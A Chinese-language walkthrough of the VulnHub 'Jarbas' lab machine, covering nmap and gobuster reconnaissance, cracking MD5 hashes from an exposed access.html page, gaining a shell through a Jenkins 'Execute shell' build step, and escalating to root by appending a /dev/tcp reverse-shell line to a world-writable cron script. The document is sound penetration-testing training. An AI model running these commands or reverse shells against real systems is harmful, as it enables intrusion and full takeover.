litemao-jarbas

一、主机发现

查看本地主机IP地址,我这里是eth1网卡和靶机在同一网络

plain 复制代码
┌──(kali㉿kali)-[~/桌面]
└─$ ip a                                             
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:0a:61:9a brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.224/24 brd 192.168.11.255 scope global dynamic eth0
       valid_lft 84946sec preferred_lft 84946sec
    inet6 fe80::20c:29ff:fe0a:619a/64 scope link proto kernel_ll 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:0a:61:a4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.16.128/24 brd 192.168.16.255 scope global dynamic noprefixroute eth1
       valid_lft 257832sec preferred_lft 257832sec
    inet6 fe80::20c:29ff:fe0a:61a4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

使用arp_scan和nmap扫描存活主机。排除kali的ip可以确认靶机的IP是192.168.16.132

plain 复制代码
┌──(kali㉿kali)-[~/桌面]
└─$ sudo arp-scan --interface=eth1 -l      
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:f8:96:9c       VMware, Inc.
192.168.16.132  00:0c:29:6d:83:4e       VMware, Inc.
192.168.16.254  00:50:56:ed:76:cc       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sn 192.168.16.0/24                    
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 10:36 CST
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.16.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:F8:96:9C (VMware)
Nmap scan report for 192.168.16.132
Host is up (0.00010s latency).
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:ED:76:CC (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.99 seconds

二、信息收集

开放端口扫描

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.16.132                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 12:35 CST
Nmap scan report for 192.168.16.132
Host is up (0.00065s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

将扫出的端口提取出来,方便后面调用

plain 复制代码
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ','
22,80,3306,8080
   
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ prots=$(grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ echo $prots                 
22,80,3306,8080

扫描端口服务。在80端口上nmap扫出靶机的系统是contOS,php的版本是/5.4.16,mysql使用的第三方管理工具是MariaDB,操作系统的内核版本可能在3.2-4.9

端口 版本
22 OpenSSH 7.4
80 Apche/2.4.6
3306 mysql
8080 http-proxy
plain 复制代码
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p $prots     //按tab键读取$prots中的端口

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p 22,80,3306 -oA detail 192.168.16.132       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:31 CST
Nmap scan report for 192.168.16.132
Host is up (0.00058s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 00:0C:29:6D:83:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds

使用udp协议扫描top20端口,只扫出来了68端口是个打开或过滤状态,未发现其他有用信息

plain 复制代码
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sU -top-ports 20 192.168.16.132 -oA udpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:44 CST
Nmap scan report for 192.168.16.132
Host is up (0.00046s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds

再用nmap的漏洞扫描脚本来探测靶机可能存在的漏洞。发现8080服务存在robots.txt文件(Dos默认是排除在外的)

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p 22,80,3306,8080 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 13:06 CST
Nmap scan report for 192.168.16.132
Host is up (0.00028s latency).

PORT     STATE SERVICE                                                                                  
22/tcp   open  ssh                                                                                      
80/tcp   open  http                                                                                     
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                        
| http-csrf:                                                                                            
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.16.132                          
|   Found the following possible CSRF vulnerabilities:                                                  
|                                                                                                       
|     Path: http://192.168.16.132:80/                                                                   
|     Form id: wmtb
|     Form action: /web/submit
|     
|     Path: http://192.168.16.132:80/
|     Form id: 
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|     
|     Path: http://192.168.16.132:80/
|     Form id: 
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 38.34 seconds

三、寻找漏洞

先去查看靶机80端口上跑的什么业务,看不懂是什么业务,不过不重要,我试了当前页面的所有有数据交互的地方发现没有实际功能,但是这个站看起来像是用框架搭起来的

查看8080端口上的服务是什么,访问后发现是一个管理员后台登陆页面,这个页面的左上角显示了使用的cms框架为"jenkins",右下角有当前jenkins的版本

查看8080服务下的robots.txt文件内容,不允许机器人点击"build"链接

使用是使用gobuster和dirb扫描一下目录,未发现有价值目录或文件

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.16.132
-----------------
DIRB v2.22    
By The Dark Raver
----------------
START_TIME: Sat Apr  5 13:26:31 2025
URL_BASE: http://192.168.16.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://192.168.16.132/ ----
+ http://192.168.16.132/cgi-bin/ (CODE:403|SIZE:210)                                                   
+ http://192.168.16.132/index.html (CODE:200|SIZE:32808)                                         
-----------------
END_TIME: Sat Apr  5 13:26:33 2025
DOWNLOADED: 4612 - FOUND: 2

gobuster换一个字典再指定扩展名看看能不能扫出来,扫出来了一个新的html文件access.html

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php
[sudo] kali 的密码:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 661680 / 661683 (100.00%)
===============================================================
Finished
===============================================================

访问access.html文件,标题提示这些是用户名和密码,根据密码格式是以32位十六进制数表示的字符大概可以判断出是使用了md5加密

使用hashid确定密码的加密方式,果然都是md5加密

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ \         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__\   / ,__\ \ \  _ \      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, \ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------
 HASH: 5978a63b4654c73c60fa24f836386d87

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: f463f63616cb3f1e81ce46b39f882fd5

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: 9b38e2b1e8b12f426b0d208a7ab6cb98

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH:

将用户名和密码存储在user.hash中,然后使用join撞库解密出了两个用户的密码,另一个使用在线工具破解了出来

用户名 密码
tiago italia99
trindade marianna
eder vipsu
plain 复制代码
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
marianna         (trindade)     
italia99         (tiago)     
2g 0:00:00:00 DONE (2025-04-05 15:31) 2.564g/s 18388Kp/s 18388Kc/s 19227KC/s  fuckyooh21..7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

__ssh试了登不上,前往刚才的后台登录页面登录,使用用户"eder:vipsu"成功登录到后台系统 _

点击"New ltem"新建项目,选择Freestyle project,项目名称随意,然后点击ok
创建好后会跳转到这个页面

然后往下拉后有个"Build"功能,点击下拉按钮可以选择想要构建的命令类型,这个靶机是linux操作系统,所以选择"Execute shell"选项
构建反弹shell,然后保存

__执行反弹shell前先使用kali监听1234端口

_

plain 复制代码
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nc -lvnp 1234                                       
[sudo] kali 的密码:
listening on [any] 1234 ...

__点击Build Now执行反弹shell __成功获取shell

四、权限提升

__查看当前用户名、系统发行版本,以及权限。这个系统用户没有sudo权限,发行版本不确定

plain 复制代码
bash-4.2$ whoami
whoami
jenkins                                                                                                
bash-4.2$ id                                                                                           
id                                                                                                     
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0            
bash-4.2$ uname -a                                                                                     
uname -a                                                                                               
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux                                                                                                     
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified

__看看能不能读取passwd和shadow文件,只有passwd可以正常读取

plain 复制代码
bash-4.2$ cat /etc/passwd                                                                              
cat /etc/passwd     

root:x:0:0:root:/root:/bin/bash                                                                  
bin:x:1:1:bin:/bin:/sbin/nologin                                                                 
daemon:x:2:2:daemon:/sbin:/sbin/nologin                                                          
adm:x:3:4:adm:/var/adm:/sbin/nologin                                                             lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied

_

__先查看系统自动化任务看看有没有可利用的地方。在linux中/etc/cron.d是一个用于存储系统级定时任务的目录,我们先查看cron.d中的脚本有哪些,有个0hourly文件,读取内容发现里面是执行cron.hourly文件,再去看看cron.hourly目录下有什么,发现了0anacron文件,但是该文件是个电源检测搅拌,并且每天脚本前面会判断该脚本今天是否已经执行过,如果已经执行过,则退出运行,并且我们并没有该文件的写入权限。

_

plain 复制代码
bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cd /etc/cron.d
cd /etc/cron.d                                                                                         
bash-4.2$ ls                                                                                           
ls                                                                                                     
0hourly                                                                                                
bash-4.2$ cat 0hourly                                                                                  
cat 0hourly                                                                                            

Run the hourly jobs                                                                                  
SHELL=/bin/bash                                                                                        
PATH=/sbin:/bin:/usr/sbin:/usr/bin                                                                     
MAILTO=root                                                                                            
01     root run-parts /etc/cron.hourly                                                             
bash-4.2$ ls -l                                                                                        
ls -l                                                                                                  
total 4                                                                                                
-rw-r--r--. 1 root root 128 Aug  3  2017 0hourly                                                 
bash-4.2$ cd /etc/cron.hourly 
cd /etc/cron.hourly 
bash-4.2$ ls
ls
0anacron
bash-4.2$ cat 0anacron
cat 0anacron
#!/bin/sh

Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
    day=cat /var/spool/anacron/cron.daily
fi
if [ date +%Y%m%d = "$day" ]; then
    exit 0;
fi


Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
    /usr/bin/on_ac_power >/dev/null 2>&1
    if test $? -eq 1; then
    exit 0
    fi
fi
/usr/sbin/anacron -s
bash-4.2$ ls -l
ls -l
total 4
-rwxr-xr-x. 1 root root 392 Aug  3  2017 0anacron

_

__另辟蹊径,在linux中当然不止cron.d这一个用于存放系统自动任务的方法,还有一个类似文件也是用于存储系统自动任务的文件,就是crontab,我们看看/etc/crontab,先看一下该文件的权限是否有写入权限,没有,再看看内容该脚本每五分钟将script目录下的CleaningScript.sh丢入垃圾桶中,查看CleaningScript.sh文件权限,我们拥有写入权限,只要能写入反弹shell,crontab就会执行CleaningScript.sh文件中的反弹shell,看一下里面的内容,是用来删除日志文件脚本。

_

plain 复制代码
bash-4.2$ ls -l crontab
ls -l crontab
-rw-r--r--. 1 root root 513 Apr  1  2018 crontab

bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root


For details see man 4 crontabs


Example of job definition:

.---------------- minute (0 - 59)

|  .------------- hour (0 - 23)

|  |  .---------- day of month (1 - 31)

|  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...

|  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

|  |  |  |  |

         user-name  command to be executed
/5    * root /etc/script/CleaningScript.sh >/dev/null 2>&1

bash-4.2$ cd /etc/script
cd /etc/script
bash-4.2$ ls -l
ls -l
total 4
-rwxrwxrwx. 1 root root 50 Apr  1  2018 CleaningScript.sh
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt

先监听用于连接反弹的端口2233,我们在CleaningScript.sh文件中追加一个反弹shell,由于crontab是每五分钟执行一次,所以可能要等一会

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233              
listening on [any] 2233 ...

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh    
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1

成功建立反弹shell,获取root权限

plain 复制代码
┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233              
[sudo] kali 的密码:
listening on [any] 2233 ...
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.132] 58976
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@jarbas ~]#

读取flag

plain 复制代码
[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt            
cat flag.txt
Hey!  嘿!

Congratulations! You got it! I always knew you could do it!     恭喜你!搞定啦!我就知道你能行!  

This challenge was very easy, huh? =)   这个挑战很简单吧?=)

Thanks for appreciating this machine.  感谢你喜欢这台机器。

@tiagotvrs 
[root@jarbas ~]#

总结

使用nmap扫描靶机端口发现22,80,3306和8080端口,在80端口上运行着一个类似于新闻服务的网站,但是这个网站并没有实际交互功能,再去查看8080端口上的服务。发现是一个后台管理页面,这时并没有用户名和密码,再查看nmap漏洞扫描出的robots.txt文件内容,提示"不要点击"build链接",然后使用gobuster和dirb扫描网站的目录,并没有扫出目录,再次尝试使用gobuster扫描时指定扩展名为html和php,这次扫出了"access.html"页面,发现内容是三个用户和密码,密码被md5加密了,使用john和在线破解工具破解的三个用户的密码,然后去登陆后台,只有eder用户可以成功登录,登录后跳转到jenkins的项目管理页面,点击"New ltem"新建项目,选择Freestyle project,在下面的"Build"功能选择"Execute shell"选项构建反弹shell,成功获取shell后发现是个系统用户,并且没有sudo权限,寻找系统中的自动任务文件,在/etc/cron.d目录中有个0hourly 文件,0hourly 会执行cron.hour查看另一个目录0hourly ,在0hourly 目录中有个0anacron文件,我们没有该文件的写入权限,所以要换下一个系统任务文件crontab,查看其内容,每五分钟会运行CleaningScript.sh文件,而CleaningScript.sh我们正好有写入权限,在CleaningScript.sh文件中追加反弹shell,kali监听指定端口,过一会就会收到反弹shell。

相关推荐
_Itachi__5 分钟前
Python 中的 collections 库:高效数据结构的利器
linux·数据结构·python
用手码出世界21 分钟前
【Linux】日志与策略模式、线程池
linux·运维·服务器·开发语言·c++·策略模式
RanQQQ28 分钟前
第六章 流量特征分析-常见攻击事件 tomcat wp
网络·web安全·网络安全·tomcat
ZHOU_WUYI1 小时前
WSL在D盘安装Ubuntu
linux·运维·ubuntu
ephemerals__1 小时前
【Linux】命令行参数与环境变量
linux·运维·服务器
A_Tai23333331 小时前
Linux-02-VIM和VI编辑器
linux·编辑器·vim
tanqth2 小时前
使用Delphi 和 CrossVcl 开发基于VCL的 macOS 和 Linux 应用程序简介
linux·delphi·crossvcl·vcl开发的linux
lswzw2 小时前
rsync命令详解与实用案例
linux·服务器·网络
云边有个稻草人2 小时前
【Linux系统】第二节—基础指令(2)
linux·linux基础指令·linux相关知识·find cat less
神里流~霜灭2 小时前
Linux系统基础:基础指令简介(网络概念部分)
linux·c++·协议·ip·tcp